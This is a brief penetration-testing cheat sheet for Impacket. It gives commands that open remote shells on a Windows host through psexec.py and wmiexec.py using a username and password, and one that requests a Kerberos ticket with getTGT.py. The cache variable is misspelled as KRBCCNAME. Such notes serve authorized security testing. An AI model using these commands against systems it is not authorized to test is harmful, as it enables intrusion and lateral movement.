Cheatsheet

Impacket

The tool creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host.

psexec.py qu35t.pw/qu35t:'Password1!'@10.10.10.10

Wmiexec.py utilizes a semi-interactive shell where commands are executed through Windows Management Instrumentation.

wmiexec.py qu35t.pw/qu35t:'Password1!'@10.10.10.10

getTGT.py qu35t.pw/qu35t
export KRBCCNAME=qu35t.ccache

Last updated 11 months ago